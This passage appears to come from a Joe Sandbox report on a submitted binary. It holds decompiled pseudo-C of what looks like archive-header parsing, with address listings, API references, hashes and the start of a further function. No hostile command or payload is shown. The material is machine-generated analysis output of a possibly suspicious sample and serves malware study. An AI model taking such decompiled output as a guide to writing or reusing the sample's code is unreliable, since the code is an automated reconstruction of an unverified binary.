											_t377 =  !( ~_t374) &  *(_t708 + 0x5b);
											 *(_t708 + 0x5b) = _t377;
											_t657 = _t657 - 1;
											__eflags = _t657;
										} while (_t657 != 0);
										__eflags = _t377;
										if(_t377 != 0) {
											goto L130;
										}
										goto L128;
									}
									_t354 = 0;
									__eflags =  *(_t516 + 0x2234);
									if( *(_t516 + 0x2234) == 0) {
										goto L118;
									}
									goto L117;
								}
								_t378 = _t340 - 1;
								__eflags = _t378;
								if(_t378 == 0) {
									L35:
									__eflags = _t537 - 2;
									_t68 = (0 | _t537 == 0x00000002) - 1; // -1
									_t665 = (_t68 & 0x00002350) + 0x2298 + _t516;
									 *(_t708 + 0x4c) = _t665;
									E00B6ACC4(_t665, 0);
									_t560 = 5;
									memcpy(_t665, _t516 + 0x21fc, _t560 << 2);
									_t694 =  *(_t708 + 0x4c);
									_t668 =  *(_t708 + 0x18);
									_t562 =  *(_t694 + 8);
									 *(_t694 + 0x1098) =  *(_t694 + 8) & 1;
									 *(_t694 + 0x1099) = _t562 >> 0x00000001 & 1;
									 *(_t694 + 0x109b) = _t562 >> 0x00000002 & 1;
									 *(_t694 + 0x10a0) = _t562 >> 0x0000000a & 1;
									_t395 = _t562 & 0x00000010;
									__eflags = _t668 - 2;
									if(_t668 != 2) {
										L38:
										_t643 = 0;
										__eflags = 0;
										 *(_t708 + 0x5b) = 0;
										L39:
										 *((char*)(_t694 + 0x10f0)) =  *(_t708 + 0x5b);
										_t516 =  *((intOrPtr*)(_t708 + 0x14));
										__eflags = _t668 - 2;
										if(_t668 == 2) {
											L41:
											_t396 = _t643;
											L42:
											 *(_t694 + 0x10fa) = _t396;
											_t563 = _t562 & 0x000000e0;
											__eflags = _t563 - 0xe0;
											 *((char*)(_t694 + 0x10f1)) = 0 | _t563 == 0x000000e0;
											__eflags = _t563 - 0xe0;
											if(_t563 != 0xe0) {
												_t644 =  *(_t694 + 8);
												_t400 = 0x10000 << (_t644 >> 0x00000005 & 0x00000007);
												__eflags = 0x10000;
											} else {
												_t400 = _t643;
												_t644 =  *(_t694 + 8);
											}
											 *(_t694 + 0x10f4) = _t400;
											 *(_t694 + 0x10f3) = _t644 >> 0x0000000b & 0x00000001;
											 *(_t694 + 0x10f2) = _t644 >> 0x00000003 & 0x00000001;
											 *((intOrPtr*)(_t694 + 0x14)) = E00B6CBFB(_t708 + 0x1c);
											 *((intOrPtr*)(_t708 + 0x54)) = E00B6CBFB(_t708 + 0x1c);
											 *((char*)(_t694 + 0x18)) = E00B6CBAF(_t708 + 0x1c);
											 *(_t694 + 0x1070) = 2;
											 *((intOrPtr*)(_t694 + 0x1074)) = E00B6CBFB(_t708 + 0x1c);
											 *(_t708 + 0x44) = E00B6CBFB(_t708 + 0x1c);
											 *(_t694 + 0x1c) = E00B6CBAF(_t708 + 0x1c) & 0x000000ff;
											 *((char*)(_t694 + 0x20)) = E00B6CBAF(_t708 + 0x1c) - 0x30;
											 *(_t708 + 0x50) = E00B6CBC6(_t708 + 0x1c) & 0x0000ffff;
											_t413 = E00B6CBFB(_t708 + 0x1c);
											_t647 =  *(_t694 + 0x1c);
											 *(_t708 + 0x48) = _t413;
											 *(_t694 + 0x24) = _t413;
											__eflags = _t647 - 0x14;
											if(_t647 < 0x14) {
												__eflags = _t413 & 0x00000010;
												if((_t413 & 0x00000010) != 0) {
													 *((char*)(_t694 + 0x10f1)) = 1;
												}
											}
											 *(_t694 + 0x109c) = 0;
											__eflags =  *(_t694 + 0x109b);
											if( *(_t694 + 0x109b) == 0) {
												L57:
												_t414 =  *((intOrPtr*)(_t694 + 0x18));
												 *(_t694 + 0x10fc) = 2;
												__eflags = _t414 - 3;
												if(_t414 == 3) {
													L61:
													 *(_t694 + 0x10fc) = 1;
													L62:
													 *(_t694 + 0x1100) = 0;
													__eflags = _t414 - 3;
													if(_t414 == 3) {
														__eflags = ( *(_t708 + 0x48) & 0x0000f000) - 0xa000;
														if(( *(_t708 + 0x48) & 0x0000f000) == 0xa000) {
															__eflags = 0;
															 *(_t694 + 0x1100) = 1;
															 *((short*)(_t694 + 0x1104)) = 0;
														}
													}
													__eflags = _t668 - 2;
													if(_t668 == 2) {
														L67:
														_t415 = 0;
														goto L68;
													} else {
														_t415 = 1;
														__eflags =  *(_t694 + 0x24);
														if( *(_t694 + 0x24) < 0) {
															L68:
															 *((char*)(_t694 + 0x10f8)) = _t415;
															_t418 =  *(_t694 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t418;
															 *(_t694 + 0x10f9) = _t418;
															if(_t418 == 0) {
																__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
																_t640 = 0;
																_t669 = 0;
																_t141 =  *((intOrPtr*)(_t708 + 0x54)) == 0xffffffff;
																__eflags = _t141;
																_t419 = _t418 & 0xffffff00 | _t141;
																L74:
																 *(_t694 + 0x109a) = _t419;
																 *(_t708 + 0x5b) = _t419;
																 *((intOrPtr*)(_t694 + 0x1058)) = 0 +  *((intOrPtr*)(_t694 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t694 + 0x105c)) = _t669;
																asm("adc edx, ecx");
																 *(_t694 + 0x1060) = 0 +  *((intOrPtr*)(_t708 + 0x54));
																__eflags =  *(_t708 + 0x5b);
																 *(_t694 + 0x1064) = _t640;
																if( *(_t708 + 0x5b) != 0) {
																	 *(_t694 + 0x1060) = 0x7fffffff;
																	 *(_t694 + 0x1064) = 0x7fffffff;
																}
																_t424 =  *(_t708 + 0x50);
																_t670 = 0x1fff;
																__eflags = _t424 - 0x1fff;
																if(_t424 < 0x1fff) {
																	_t670 = _t424;
																}
																E00B6CC5D(_t708 + 0x1c, _t708 - 0x2030, _t670);
																_t427 = 0;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((char*)(_t708 + _t670 - 0x2030)) = 0;
																_t585 = ((0 |  *(_t708 + 0x18) == 0x00000002) - 0x00000001 & 0x00002350) + 0x22c0 + _t516;
																__eflags =  *(_t708 + 0x18) - 2;
																 *((intOrPtr*)(_t708 + 0x54)) = _t585;
																if( *(_t708 + 0x18) != 2) {
																	E00B71B84(_t708 - 0x2030, _t585, 0x800);
																	_t431 =  *((intOrPtr*)(_t694 + 0xc)) -  *(_t708 + 0x50);
																	__eflags =  *(_t694 + 8) & 0x00000400;
																	_t671 = _t431 - 0x20;
																	if(( *(_t694 + 8) & 0x00000400) != 0) {
																		_t671 = _t431 - 0x28;
																	}
																	__eflags = _t671;
																	if(_t671 > 0) {
																		E00B620BD(_t694 + 0x1028, _t671);
																		_t676 = _t694 + 0x1028;
																		_t431 = E00B83E49(E00B6CC5D(_t708 + 0x1c,  *_t676, _t671),  *((intOrPtr*)(_t708 + 0x54)), L"RR");
																		__eflags = _t431;
																		if(_t431 == 0) {
																			__eflags =  *((intOrPtr*)(_t694 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t694 + 0x102c)) >= 0x14) {
																				_t609 =  *_t676;
																				_t184 = _t609 + 0xb; // 0x7500
																				asm("cdq");
																				_t695 =  *_t184 & 0x000000ff;
																				_t185 = _t609 + 0xa; // 0x750025
																				asm("cdq");
																				_t697 = (_t695 << 8) + ( *_t185 & 0x000000ff);
																				_t190 = _t609 + 9; // 0x75002500
																				asm("adc edi, edx");
																				asm("cdq");
																				_t699 = (_t697 << 8) + ( *_t190 & 0x000000ff);
																				_t195 = _t609 + 8; // 0x250068
																				asm("adc edi, edx");
																				asm("cdq");
																				_t701 = (_t699 << 8) + ( *_t195 & 0x000000ff);
																				asm("adc edi, edx");
																				 *(_t516 + 0x21d8) = _t701 << 9;
																				 *(_t516 + 0x21dc) = ((((_t640 << 0x00000020 | _t695) << 0x8 << 0x00000020 | _t697) << 0x8 << 0x00000020 | _t699) << 0x8 << 0x00000020 | _t701) << 9;
																				 *0xb93278();
																				_t469 = E00B70264( *(_t516 + 0x21d8),  *(_t516 + 0x21dc),  *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0x14))))(), _t640);
																				 *(_t516 + 0x21e0) = _t469;
																				 *(_t708 + 0x48) = _t469;
																				_t470 = E00B7EBA0(_t468, _t640, 0xc8, 0);
																				asm("adc edx, [ebx+0x21dc]");
																				_t431 = E00B70264(_t470 +  *(_t516 + 0x21d8), _t640, _t468, _t640);
																				_t612 =  *(_t708 + 0x48);
																				_t694 =  *(_t708 + 0x4c);
																				__eflags = _t431 - _t612;
																				if(_t431 > _t612) {
																					_t431 = _t612 + 1;
																					 *(_t516 + 0x21e0) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t432 = E00B83E49(_t431,  *((intOrPtr*)(_t708 + 0x54)), L"CMT");
																	__eflags = _t432;
																	if(_t432 == 0) {
																		 *((char*)(_t516 + 0x6cce)) = 1;
																	}
																} else {
																	_t640 = 0;
																	 *_t585 = 0;
																	__eflags =  *(_t694 + 8) & 0x00000200;
																	if(( *(_t694 + 8) & 0x00000200) != 0) {
																		E00B66976(_t708);
																		_t478 = E00B83E90(_t708 - 0x2030) + 1;
																		__eflags = _t670 - _t478;
																		if(_t670 > _t478) {
																			__eflags = _t478 + _t708 - 0x2030;
																			E00B66986(_t708, _t708 - 0x2030, _t670, _t478 + _t708 - 0x2030, _t670 - _t478,  *((intOrPtr*)(_t708 + 0x54)), 0x800);
																		}
																		_t585 =  *((intOrPtr*)(_t708 + 0x54));
																		_t427 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t585 - _t427;
																	if( *_t585 == _t427) {
																		_push(1);
																		_push(0x800);
																		_push(_t585);
																		_push(_t708 - 0x2030);
																		E00B702BA();
																	}
																	E00B62134(_t516, _t694);
																}
																__eflags =  *(_t694 + 8) & 0x00000400;
																if(( *(_t694 + 8) & 0x00000400) != 0) {
																	E00B6CC5D(_t708 + 0x1c, _t694 + 0x10a1, 8);
																}
																E00B7140E( *(_t708 + 0x44));
																__eflags =  *(_t694 + 8) & 0x00001000;
																if(( *(_t694 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t516 + 0x6cc0)) = E00B63EFB( *((intOrPtr*)(_t516 + 0x6cc0)),  *(_t516 + 0x6cc4),  *((intOrPtr*)(_t694 + 0x1058)),  *((intOrPtr*)(_t694 + 0x105c)), 0, 0);
																	 *(_t516 + 0x6cc4) = _t640;
																	 *(_t708 + 0x44) =  *(_t694 + 0x10f2);
																	_t437 = E00B6CCAC(_t708 + 0x1c,  *(_t708 + 0x44));
																	__eflags =  *_t694 - (_t437 & 0x0000ffff);
																	if( *_t694 != (_t437 & 0x0000ffff)) {
																		 *((char*)(_t516 + 0x6cdc)) = 1;
																		E00B66D83(0xba1098, 1);
																		__eflags =  *((char*)(_t708 + 0x5a));
																		if(__eflags == 0) {
																			E00B62021(__eflags, 0x1c, _t516 + 0x32,  *((intOrPtr*)(_t708 + 0x54)));
																		}
																	}
																	goto L119;
																} else {
																	_t442 = E00B6CBC6(_t708 + 0x1c);
																	 *_t708 = _t516 + 0x32d8;
																	 *((intOrPtr*)(_t708 + 4)) = _t516 + 0x32e0;
																	 *((intOrPtr*)(_t708 + 8)) = _t516 + 0x32e8;
																	__eflags = 0;
																	_t672 = 0;
																	 *((intOrPtr*)(_t708 + 0xc)) = 0;
																	_t447 = _t442 & 0x0000ffff;
																	 *(_t708 + 0x50) = 0;
																	 *(_t708 + 0x44) = _t447;
																	do {
																		_t593 = 3;
																		_t520 = _t447 >> _t593 - _t672 << 2;
																		__eflags = _t520 & 0x00000008;
																		if((_t520 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t708 + _t672 * 4);
																		if( *(_t708 + _t672 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t672;
																		if(__eflags != 0) {
																			E00B7140E(E00B6CBFB(_t708 + 0x1c));
																		}
																		E00B71218( *(_t708 + _t672 * 4), _t640, _t708, __eflags, _t708 - 0x30);
																		__eflags = _t520 & 0x00000004;
																		if((_t520 & 0x00000004) != 0) {
																			_t249 = _t708 - 0x1c;
																			 *_t249 =  *(_t708 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t597 = 0;
																		 *(_t708 - 0x18) = 0;
																		_t521 = _t520 & 0x00000003;
																		__eflags = _t521;
																		if(_t521 <= 0) {
																			L109:
																			_t450 = _t597 * 0x64;
																			__eflags = _t450;
																			 *(_t708 - 0x18) = _t450;
																			E00B7146A( *(_t708 + _t672 * 4), _t640, _t708 - 0x30);
																			_t447 =  *(_t708 + 0x44);
																		} else {
																			_t673 = 3;
																			_t675 = _t673 - _t521 << 3;
																			__eflags = _t675;
																			do {
																				_t455 = (E00B6CBAF(_t708 + 0x1c) & 0x000000ff) << _t675;
																				_t675 = _t675 + 8;
																				_t597 =  *(_t708 - 0x18) | _t455;
																				 *(_t708 - 0x18) = _t597;
																				_t521 = _t521 - 1;
																				__eflags = _t521;
																			} while (_t521 != 0);
																			_t672 =  *(_t708 + 0x50);
																			goto L109;
																		}
																		L110:
																		_t672 = _t672 + 1;
																		 *(_t708 + 0x50) = _t672;
																		__eflags = _t672 - 4;
																	} while (_t672 < 4);
																	_t516 =  *((intOrPtr*)(_t708 + 0x14));
																	goto L112;
																}
															}
															_t669 = E00B6CBFB(_t708 + 0x1c);
															_t484 = E00B6CBFB(_t708 + 0x1c);
															__eflags =  *((intOrPtr*)(_t708 + 0x54)) - 0xffffffff;
															_t640 = _t484;
															if( *((intOrPtr*)(_t708 + 0x54)) != 0xffffffff) {
																L72:
																_t419 = 0;
																goto L74;
															}
															__eflags = _t640 - 0xffffffff;
															if(_t640 != 0xffffffff) {
																goto L72;
															}
															_t419 = 1;
															goto L74;
														}
														goto L67;
													}
												}
												__eflags = _t414 - 5;
												if(_t414 == 5) {
													goto L61;
												}
												__eflags = _t414 - 6;
												if(_t414 < 6) {
													 *(_t694 + 0x10fc) = 0;
												}
												goto L62;
											} else {
												_t648 = _t647 - 0xd;
												__eflags = _t648;
												if(_t648 == 0) {
													 *(_t694 + 0x109c) = 1;
													goto L57;
												}
												_t650 = _t648;
												__eflags = _t650;
												if(_t650 == 0) {
													 *(_t694 + 0x109c) = 2;
													goto L57;
												}
												_t651 = _t650 - 5;
												__eflags = _t651;
												if(_t651 == 0) {
													L54:
													 *(_t694 + 0x109c) = 3;
													goto L57;
												}
												__eflags = _t651 == 6;
												if(_t651 == 6) {
													goto L54;
												}
												 *(_t694 + 0x109c) = 4;
												goto L57;
											}
										}
										__eflags = _t395;
										_t396 = 1;
										if(_t395 != 0) {
											goto L42;
										}
										goto L41;
									}
									__eflags = _t395;
									if(_t395 == 0) {
										goto L38;
									}
									 *(_t708 + 0x5b) = 1;
									_t643 = 0;
									goto L39;
								}
								_t488 = _t378 - 1;
								__eflags = _t488;
								if(_t488 == 0) {
									goto L35;
								}
								__eflags = _t488 == 0;
								if(_t488 == 0) {
									_t624 = 5;
									memcpy(_t516 + 0x45a8, _t516 + 0x21fc, _t624 << 2);
									_t653 =  *(_t516 + 0x45b0);
									 *(_t516 + 0x45c4) =  *(_t516 + 0x45b0) & 0x00000001;
									_t628 = _t653 >> 0x00000001 & 0x00000001;
									_t640 = _t653 >> 0x00000003 & 0x00000001;
									 *(_t516 + 0x45c5) = _t628;
									 *(_t516 + 0x45c6) = _t653 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x45c7) = _t640;
									__eflags = _t628;
									if(_t628 != 0) {
										 *((intOrPtr*)(_t516 + 0x45bc)) = E00B6CBFB(_t708 + 0x1c);
									}
									__eflags =  *(_t516 + 0x45c7);
									if( *(_t516 + 0x45c7) != 0) {
										_t498 = E00B6CBC6(_t708 + 0x1c) & 0x0000ffff;
										 *(_t516 + 0x45c0) = _t498;
										 *(_t516 + 0x6cf0) = _t498;
									}
									goto L119;
								} else {
									__eflags =  *(_t516 + 0x2204) & 0x00008000;
									if(( *(_t516 + 0x2204) & 0x00008000) != 0) {
										 *((intOrPtr*)(_t516 + 0x6cc0)) =  *((intOrPtr*)(_t516 + 0x6cc0)) + E00B6CBFB(_t708 + 0x1c);
										asm("adc dword [ebx+0x6cc4], 0x0");
									}
									goto L120;
								}
							}
							__eflags = _t688 - 1;
							if(_t688 != 1) {
								L24:
								_t335 = _t533 - 7;
								goto L25;
							}
							__eflags =  *(_t516 + 0x2204) & 0x00000002;
							if(( *(_t516 + 0x2204) & 0x00000002) == 0) {
								goto L24;
							}
							goto L23;
						}
						_t501 = _t334 - 1;
						__eflags = _t501;
						if(_t501 == 0) {
							 *(_t516 + 0x2200) = _t640;
							_t688 = _t640;
							goto L20;
						}
						_t502 = _t501 - 6;
						__eflags = _t502;
						if(_t502 == 0) {
							_push(3);
							L17:
							_pop(_t503);
							 *(_t516 + 0x2200) = _t503;
							_t688 = _t503;
							goto L20;
						}
						__eflags = _t502 != 1;
						if(_t502 != 1) {
							goto L20;
						} else {
							_push(5);
							goto L17;
						}
					} else {
						E00B620D7(_t516);
						goto L131;
					}
				}
				_t639 =  *((intOrPtr*)(__ecx + 0x6cd8)) + _t657;
				asm("adc eax, ecx");
				_t718 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t718 < 0 || _t718 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t639) {
					goto L7;
				} else {
					 *((char*)(_t708 + 0x5a)) = 1;
					E00B63E6D(_t516);
					 *0xb93278(_t708 + 0x40, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t516 + 0xc))))() == 8) {
						_t707 = _t516 + 0x1038;
						E00B6603A(_t707, 0, 4,  *((intOrPtr*)(_t516 + 0x21d4)) + 0x6024, _t708 + 0x40, 0, 0, 0, 0);
						 *((intOrPtr*)(_t708 + 0x3c)) = _t707;
						goto L8;
					}
					goto L5;
				}
			}

0x00b62874
0x00b6287e
0x00b62885
0x00b6288c
0x00b6288f
0x00b62898
0x00b6289b
0x00b6289e
0x00b628a5
0x00b62923
0x00b62923
0x00b62926
0x00b62926
0x00b6292a
0x00b6292f
0x00b62933
0x00b628ec
0x00b628ee
0x00b632da
0x00b632dd
0x00b632eb
0x00b632f6
0x00b632f6
0x00b62943
0x00b62949
0x00b62958
0x00b62960
0x00b62966
0x00b62971
0x00b6297c
0x00b6297f
0x00b62985
0x00b6298b
0x00b6298d
0x00b6299f
0x00b629a0
0x00b629a0
0x00b629a3
0x00b629d1
0x00b629db
0x00b629db
0x00b629dc
0x00b629dc
0x00b629e2
0x00b629e5
0x00b629f5
0x00b629f7
0x00b629fd
0x00b629fd
0x00b62a01
0x00b62a0e
0x00b62a1f
0x00b62a22
0x00b62a28
0x00b62a2e
0x00b62a36
0x00b62a39
0x00b62a39
0x00b62a3c
0x00b63159
0x00b63161
0x00b63168
0x00b6316f
0x00b6317c
0x00b6318e
0x00b63193
0x00b63199
0x00b631ab
0x00b631b1
0x00b631be
0x00b631cb
0x00b631d8
0x00b631de
0x00b631e0
0x00b631ed
0x00b631ed
0x00b631ef
0x00b631ef
0x00b631fb
0x00b6320b
0x00b6320b
0x00b6320e
0x00b63214
0x00b6321a
0x00b6321c
0x00b6321d
0x00b63222
0x00b6322a
0x00b63230
0x00b632d4
0x00b632d7
0x00000000
0x00b632d7
0x00b63236
0x00b6323c
0x00b6323f
0x00000000
0x00000000
0x00b63245
0x00b63248
0x00000000
0x00000000
0x00b6324e
0x00b63251
0x00b632a6
0x00b632ad
0x00b632b4
0x00b632b9
0x00b632bd
0x00000000
0x00000000
0x00b632c6
0x00b632cb
0x00000000
0x00b632cb
0x00b63253
0x00b6325a
0x00000000
0x00000000
0x00b63263
0x00b63271
0x00b63271
0x00b63274
0x00b6327b
0x00b63283
0x00b63286
0x00b6328a
0x00b6328c
0x00b63293
0x00b63297
0x00b6329a
0x00b6329d
0x00b6329d
0x00b6329d
0x00b632a2
0x00b632a4
0x00000000
0x00000000
0x00000000
0x00b632a4
0x00b631e2
0x00b631e4
0x00b631eb
0x00000000
0x00000000
0x00000000
0x00b631eb
0x00b62a42
0x00b62a42
0x00b62a45
0x00b62b0a
0x00b62b0c
0x00b62b14
0x00b62b23
0x00b62b27
0x00b62b2a
0x00b62b31
0x00b62b3a
0x00b62b3c
0x00b62b40
0x00b62b46
0x00b62b4b
0x00b62b57
0x00b62b64
0x00b62b71
0x00b62b79
0x00b62b7c
0x00b62b7f
0x00b62b8c
0x00b62b8c
0x00b62b8c
0x00b62b8e
0x00b62b91
0x00b62b94
0x00b62b9a
0x00b62b9d
0x00b62ba0
0x00b62ba8
0x00b62ba8
0x00b62baa
0x00b62baa
0x00b62bb5
0x00b62bb7
0x00b62bbc
0x00b62bc2
0x00b62bc8
0x00b62bd1
0x00b62be1
0x00b62be1
0x00b62bca
0x00b62bca
0x00b62bcc
0x00b62bcc
0x00b62be3
0x00b62bf9
0x00b62bff
0x00b62c0d
0x00b62c18
0x00b62c23
0x00b62c26
0x00b62c38
0x00b62c46
0x00b62c51
0x00b62c61
0x00b62c6c
0x00b62c72
0x00b62c77
0x00b62c7a
0x00b62c7d
0x00b62c80
0x00b62c83
0x00b62c85
0x00b62c87
0x00b62c89
0x00b62c89
0x00b62c87
0x00b62c92
0x00b62c98
0x00b62c9e
0x00b62ce3
0x00b62ce3
0x00b62ce6
0x00b62cf0
0x00b62cf2
0x00b62d04
0x00b62d04
0x00b62d0e
0x00b62d0e
0x00b62d14
0x00b62d16
0x00b62d20
0x00b62d25
0x00b62d27
0x00b62d29
0x00b62d33
0x00b62d33
0x00b62d25
0x00b62d3a
0x00b62d3d
0x00b62d46
0x00b62d46
0x00000000
0x00b62d3f
0x00b62d3f
0x00b62d41
0x00b62d44
0x00b62d48
0x00b62d48
0x00b62d54
0x00b62d54
0x00b62d56
0x00b62d5c
0x00b62d89
0x00b62d8d
0x00b62d8f
0x00b62d91
0x00b62d91
0x00b62d91
0x00b62d94
0x00b62d94
0x00b62d9a
0x00b62da2
0x00b62da8
0x00b62daf
0x00b62db5
0x00b62db7
0x00b62dbd
0x00b62dc1
0x00b62dc7
0x00b62dce
0x00b62dd4
0x00b62dd4
0x00b62dda
0x00b62ddd
0x00b62de2
0x00b62de4
0x00b62de6
0x00b62de6
0x00b62df3
0x00b62dfa
0x00b62dfc
0x00b62e00
0x00b62e17
0x00b62e19
0x00b62e1d
0x00b62e20
0x00b62ea4
0x00b62eac
0x00b62eaf
0x00b62eb6
0x00b62eb9
0x00b62ebb
0x00b62ebb
0x00b62ebe
0x00b62ec0
0x00b62ecd
0x00b62ed3
0x00b62eeb
0x00b62ef2
0x00b62ef4
0x00b62efa
0x00b62f01
0x00b62f07
0x00b62f09
0x00b62f0d
0x00b62f0e
0x00b62f12
0x00b62f1a
0x00b62f1e
0x00b62f20
0x00b62f24
0x00b62f26
0x00b62f2e
0x00b62f30
0x00b62f34
0x00b62f36
0x00b62f3e
0x00b62f42
0x00b62f4b
0x00b62f56
0x00b62f5c
0x00b62f78
0x00b62f88
0x00b62f8e
0x00b62f91
0x00b62f9c
0x00b62fa4
0x00b62fa9
0x00b62fac
0x00b62faf
0x00b62fb1
0x00b62fb3
0x00b62fb6
0x00b62fb6
0x00b62fb1
0x00b62f01
0x00b62ef4
0x00b62fc4
0x00b62fcb
0x00b62fcd
0x00b62fcf
0x00b62fcf
0x00b62e22
0x00b62e22
0x00b62e24
0x00b62e27
0x00b62e2e
0x00b62e33
0x00b62e44
0x00b62e46
0x00b62e48
0x00b62e5d
0x00b62e67
0x00b62e67
0x00b62e6c
0x00b62e6f
0x00b62e6f
0x00b62e6f
0x00b62e71
0x00b62e74
0x00b62e76
0x00b62e78
0x00b62e7d
0x00b62e84
0x00b62e85
0x00b62e85
0x00b62e8d
0x00b62e8d
0x00b62fd6
0x00b62fdd
0x00b62feb
0x00b62feb
0x00b62ff9
0x00b62ffe
0x00b63005
0x00b630dd
0x00b630fe
0x00b63107
0x00b63113
0x00b63119
0x00b63121
0x00b63123
0x00b63130
0x00b63137
0x00b6313c
0x00b63140
0x00b6314f
0x00b6314f
0x00b63140
0x00000000
0x00b6300b
0x00b6300e
0x00b6301c
0x00b63025
0x00b6302e
0x00b63031
0x00b63033
0x00b63035
0x00b63038
0x00b6303a
0x00b6303d
0x00b63040
0x00b63042
0x00b6304a
0x00b6304c
0x00b6304f
0x00000000
0x00000000
0x00b63051
0x00b63056
0x00000000
0x00000000
0x00b63058
0x00b6305a
0x00b63069
0x00b63069
0x00b63076
0x00b6307b
0x00b6307e
0x00b63080
0x00b63080
0x00b63080
0x00b63080
0x00b63083
0x00b63085
0x00b63088
0x00b63088
0x00b6308b
0x00b630b7
0x00b630b7
0x00b630b7
0x00b630be
0x00b630c5
0x00b630ca
0x00b6308d
0x00b6308f
0x00b63092
0x00b63092
0x00b63095
0x00b630a2
0x00b630a4
0x00b630aa
0x00b630ac
0x00b630af
0x00b630af
0x00b630af
0x00b630b4
0x00000000
0x00b630b4
0x00b630cd
0x00b630cd
0x00b630ce
0x00b630d1
0x00b630d1
0x00b630da
0x00000000
0x00b630da
0x00b63005
0x00b62d69
0x00b62d6b
0x00b62d70
0x00b62d74
0x00b62d76
0x00b62d83
0x00b62d85
0x00000000
0x00b62d85
0x00b62d78
0x00b62d7b
0x00000000
0x00000000
0x00b62d7d
0x00000000
0x00b62d7f
0x00000000
0x00b62d44
0x00b62d3d
0x00b62cf4
0x00b62cf6
0x00000000
0x00000000
0x00b62cf8
0x00b62cfa
0x00b62cfc
0x00b62cfc
0x00000000
0x00b62ca0
0x00b62ca0
0x00b62ca0
0x00b62ca3
0x00b62cd9
0x00000000
0x00b62cd9
0x00b62ca6
0x00b62ca6
0x00b62ca9
0x00b62ccd
0x00000000
0x00b62ccd
0x00b62cab
0x00b62cab
0x00b62cae
0x00b62cc1
0x00b62cc1
0x00000000
0x00b62cc1
0x00b62cb0
0x00b62cb3
0x00000000
0x00000000
0x00b62cb5
0x00000000
0x00b62cb5
0x00b62c9e
0x00b62ba2
0x00b62ba4
0x00b62ba6
0x00000000
0x00000000
0x00000000
0x00b62ba6
0x00b62b81
0x00b62b83
0x00000000
0x00000000
0x00b62b85
0x00b62b88
0x00000000
0x00b62b88
0x00b62a4b
0x00b62a4b
0x00b62a4e
0x00000000
0x00000000
0x00b62a55
0x00b62a58
0x00b62a8c
0x00b62a93
0x00b62a9b
0x00b62aa3
0x00b62ab2
0x00b62aba
0x00b62abd
0x00b62ac3
0x00b62ac9
0x00b62acf
0x00b62ad1
0x00b62adb
0x00b62adb
0x00b62ae1
0x00b62ae8
0x00b62af6
0x00b62af9
0x00b62aff
0x00b62aff
0x00000000
0x00b62a5a
0x00b62a5a
0x00b62a64
0x00b62a72
0x00b62a78
0x00b62a78
0x00000000
0x00b62a64
0x00b62a58
0x00b629e7
0x00b629ea
0x00b629fa
0x00b629fa
0x00000000
0x00b629fa
0x00b629ec
0x00b629f3
0x00000000
0x00000000
0x00000000
0x00b629f3
0x00b629a5
0x00b629a5
0x00b629a8
0x00b629c5
0x00b629cb
0x00000000
0x00b629cb
0x00b629aa
0x00b629aa
0x00b629ad
0x00b629b8
0x00b629ba
0x00b629ba
0x00b629bb
0x00b629c1
0x00000000
0x00b629c1
0x00b629af
0x00b629b2
0x00000000
0x00b629b4
0x00b629b4
0x00000000
0x00b629b4
0x00b6298f
0x00b62991
0x00000000
0x00b62991
0x00b6298d
0x00b628af
0x00b628b1
0x00b628b3
0x00b628b9
0x00000000
0x00b628c5
0x00b628c7
0x00b628cb
0x00b628dd
0x00b628ea
0x00b62908
0x00b62919
0x00b6291e
0x00000000
0x00b6291e
0x00000000
0x00b628ea

APIs

__EH_prolog.LIBCMT ref: 00B62874
_strlen.LIBCMT ref: 00B62E3F

Part of subcall function 00B702BA: __EH_prolog.LIBCMT ref: 00B702BF

Part of subcall function 00B71B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B6BAE9,00000000,?,?,?,0001042A), ref: 00B71BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B62F91

Strings

CMT, xrefs: 00B62FBC

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: c1851ac0f0a6887cf8f319e902c3805b2e257d041eafd3f0442a4ced6841d0ea
Instruction ID: 1a650fc6020bf774f31564dfb0c39227e67ac70ff6441fa9ccf00e86255ca806
Opcode Fuzzy Hash: c1851ac0f0a6887cf8f319e902c3805b2e257d041eafd3f0442a4ced6841d0ea
Instruction Fuzzy Hash: 566207715006458FEF19DF38C8967EA3BE1EF54300F0845BEED9A8B282DB799945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7F838 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B7F838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
